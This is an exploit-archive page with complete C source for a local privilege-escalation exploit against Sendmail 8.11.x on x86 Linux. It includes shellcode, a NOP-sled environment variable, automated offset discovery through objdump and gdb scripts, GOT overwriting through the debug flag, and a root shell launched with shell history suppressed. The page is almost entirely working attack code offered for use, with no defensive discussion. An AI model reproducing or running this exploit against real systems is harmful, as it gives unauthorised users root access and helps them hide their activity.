Sendmail 8.11.x linux/x86 local root exploit. Uses gdb to find offsets.
97fb231f9fda1d4ce349f63e8594a891166c284dcf5ab06cb3000406b26a36b9
/*
* sendmail 8.11.x exploit (i386-Linux) by sd@sf.cz (sd@ircnet)
* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
* fixed by Marcin Bukowski <insect@insect.hack.pl>
*
* <insect> I'll change, and fix this code requested by friend
* for him
*
* -d specify depth of analysis (32) [bigger = more time]
* -o change offset (-32000) [between 1000..-64000]
* -v specify victim (/usr/sbin/sendmail) [suided binary]
* -t specify temp directory (/tmp/.s11x)
*
* simply try to run an exploit without parameters
* ---------------------------------------------------------------
*
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <strings.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <signal.h>
#include <wait.h>
#include <sys/stat.h>
#define SM "/usr/sbin/sendmail"
#define OBJDUMP "objdump"
#define GDB "gdb"
#define GREP "grep"
#define COPYCMD "/bin/cp"
#define RMCMD "/bin/rm"
#define OURDIR "/tmp/.s11x"
#define DLINE \
"%s -d %s 2> /dev/null | %s -B %d \
\"mov.*%%.l,(%%e..,%%e..,1)\" |\
%s \".mov.*0x80.*,%%e..\""
#define DLINEA OBJDUMP, vict, GREP, depth, GREP
#define BRUTE_DLINE \
"%s -d %s 2> /dev/null | %s \
\".mov.*0x80.*,%%e..\""
#define BRUTE_DLINEA OBJDUMP, vict, GREP
#define NOPLEN 32768
#define NOP 0x90
char shellcode[] =
"\xeb\x0c\x5b\x31\xc0\x50\x89\xe1\x89"
"\xe2\xb0\x0b\xcd\x80\xe8\xef\xff\xff\xff";
char scode[512];
char dvict[] = SM;
struct target {
uint off;
uint brk;
uint vect;
};
unsigned int get_esp() {
__asm__("movl %esp,%eax");
}
char ourdir[256] = OURDIR;
void giveup(int i) {
char buf[256];
sprintf(buf, "%s -rf %s > /dev/null 2> /dev/null",
RMCMD, ourdir);
system(buf);
// printf("[*] removing temp directory - %s\n",
// ourdir);
if (i >= 0) exit(i);
}
void sploit(char *victim, uint got, uint vect, uint ret) {
unsigned char egg[sizeof(scode) + NOPLEN + 5];
char s[512] = "-d";
char *argv[3];
char *envp[2];
uint first, last, i;
strcpy(egg, "EGG=");
memset(egg + 4, NOP, NOPLEN);
strcpy(egg + 4 + NOPLEN, scode);
last = first = -vect - (0xffffffff - got + 1);
while (ret) {
char tmp[256];
i = ret & 0xff;
sprintf(tmp, "%u-%u.%u-", first, last, i);
strcat(s, tmp);
last = ++first;
ret = ret >> 8;
}
s[strlen(s) - 1] = 0;
argv[0] = victim;
argv[1] = s;
argv[2] = NULL;
envp[0] = egg;
envp[1] = NULL;
execve(victim, argv, envp);
}
int use(char *s) {
printf("\n%s [command] [options]\n"
"-h this help\n"
"-d specify depth of analysis (32)\n"
"-o change offset (-32000)\n"
"-v specify victim (/usr/sbin/sendmail)\n"
"-t specify temp directory (/tmp/.s11x)\n"
"-b enables bruteforce (it can take 20-30 mins)\n", s);
return 1;
}
int exploited = 0;
void sigusr(int i) {
exploited++;
giveup(-1);
}
int main(int argc, char *argv[]) {
char victim[256] = SM;
char vict[256],gscr[256],
path[256],d[256],buf[256];
struct stat st;
FILE *f;
struct target t[1024];
uint off,ep,l;
int i,j,got,esp;
int offset = -16384;
int depth = 32;
int brute = 0;
if (!*argv) {
dup2(2, 0);
dup2(2, 1);
setuid(0);
setgid(0);
kill(getppid(), SIGUSR1);
printf(
"------(*)>+== "
"ENTERING ROOT SHELL"
" ==+<(*)------"
);
fflush(stdout);
chdir("/");
setenv("PATH",
"/bin:/usr/bin:/usr/local/bin:"
"/sbin:/usr/sbin:/usr/local/sbin:"
"/opt/bin:${PATH}",1);
setenv("BASH_HISTORY",
"/dev/null", 1);
execl("/bin/bash", "-bash", NULL);
}
printf(
" ------------------------------------------------\n"
" Sendmail 8.11.x linux i386 exploit \n"
" wroten by sd@sf.cz [sd@ircnet], \n"
" fixed by insect@insect.hack.pl \n"
" ------------------------------------------------\n"
" type \"%s -h\" to get help\n",argv[0]
);
while ((i=getopt(argc,argv,"hd:o:v:t:b"))!=EOF){
switch (i) {
case 'd':
if ((!optarg)||(sscanf(optarg,"%d",&depth)!=1))
return use(argv[0]);
break;
case 'o':
if ((!optarg)||(sscanf(optarg,"%d",&offset)!=1))
return use(argv[0]);
break;
case 'v':
if (!optarg)
return use(argv[0]);
strcpy(victim,optarg);
break;
case 't':
if (!optarg)
return use(argv[0]);
strcpy(ourdir, optarg);
break;
case 'b':
brute++;
break;
case 'h':
default:
return use(argv[0]);
}
}
if (brute)
printf(
"[*] brute force "
"to 20-30mins\n");
path[0] = 0;
if (argv[0][0] != '/') {
getcwd(path, 256);
}
sprintf(scode, "%s%s/%s",
shellcode, path, argv[0]);
esp = get_esp();
close(0);
signal(SIGUSR1, sigusr);
giveup(-1);
printf(
" [Victim=%s][Depth=%d][Offset=%d]\n"
" [Temp=%s][Offset=%d][ESP=0x%08x]\n",
victim, depth, offset, ourdir, esp
);
stat(victim, &st);
if ((st.st_mode & S_ISUID) == 0) {
printf("[!] Error: %s doesn't have SUID mode\n",
victim);
}
if (access(victim, R_OK + X_OK + F_OK) < 0) {
printf("[!] Error: %s must exist, have mode +rx\n",
victim);
}
if (mkdir(ourdir, 0777) < 0) {
perror("[!] Error: creating temporary directory\n");
giveup(1);
}
//printf("[*] creating temp directory - %s\n",
// ourdir);
sprintf(buf, "%s -R %s | %s setuid",
OBJDUMP, victim, GREP);
f = popen(buf, "r");
if (fscanf(f, "%x", &got) != 1) {
pclose(f);
printf("[!] Error: cannot get "
"setuid() GOT\n");
giveup(1);
}
pclose(f);
printf("[*] --> Step 1. setuid() "
"[got=0x%08x]\n", got);
sprintf(vict, "%s/sm", ourdir);
printf("[*] --> Step 2. copy "
"[%s->%s]\n", victim, vict);
fflush(stdout);
sprintf(buf, "%s -f %s %s",
COPYCMD, victim, vict);
system(buf);
if (access(vict,R_OK+X_OK+F_OK)<0){
printf(
"[!] Error: copy victim to out temp\n");
giveup(1);
}
printf(
"[*] --> Step 3. disassm our "
"[%s]\n", vict);
fflush(stdout);
if (!brute) {
sprintf(buf,DLINE,DLINEA);
} else {
sprintf(buf,BRUTE_DLINE,BRUTE_DLINEA);
}
f = popen(buf, "r");
i = 0;
while (fgets(buf,256,f)) {
int k, dontadd=0;
if (sscanf(buf,
"%x: %s %s %s %s %s %s 0x%x,%s\n",
&ep,d,d,d,d,d,d,&off,d)==9){
for (k=0;k<i;k++){
if (t[k].off==off)
dontadd++;
}
if (!dontadd) {
t[i].off = off;
t[i++].brk = ep;
}
}
}
pclose(f);
sprintf(gscr, "%s/gdb", ourdir);
off = 0;
for (j=0; j < i; j++) {
f = fopen(gscr, "w+");
if (!f) {
printf("[!] Error: Cannot create gdb script\n");
giveup(1);
}
fprintf(f,
"break *0x%x\nr -d1-1.1\nx/x 0x%x\n",
t[j].brk, t[j].off);
fclose(f);
sprintf(buf,
"%s -batch -x %s %s 2> /dev/null",
GDB, gscr, vict);
f = popen(buf, "r");
if (!f) {
printf("[!] Error: Failed to spawn gdb!\n");
giveup(1);
}
while (1) {
char buf[256];
char *p;
t[j].vect = 0;
p = fgets(buf, 256, f);
if (!p) break;
if (sscanf(p,"0x%x %s 0x%x",&ep,d,&l)==3){
t[j].vect = l;
off++;
break;
}
}
pclose(f);
if (t[j].vect) {
int pid;
printf(" ++[%d/%d](%d%%) "
"GOT=0x%08x,VECT=0x%08x,"
"OFF=%d\n", j, i, j*100/i,
got, t[j].vect, offset);
fflush(stdout);
pid = fork();
if (pid == 0) {
close(1);
sploit(victim,got,t[j].vect,esp+offset);
}
wait(NULL);
if (exploited) {
wait(NULL);
printf(" [-*-] We rule! BYE! [-*-]\n");
exit(0);
}
}
}
printf(
"[!] ERROR: all targets failed,"
"probably not buggie\n");
giveup(1);
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed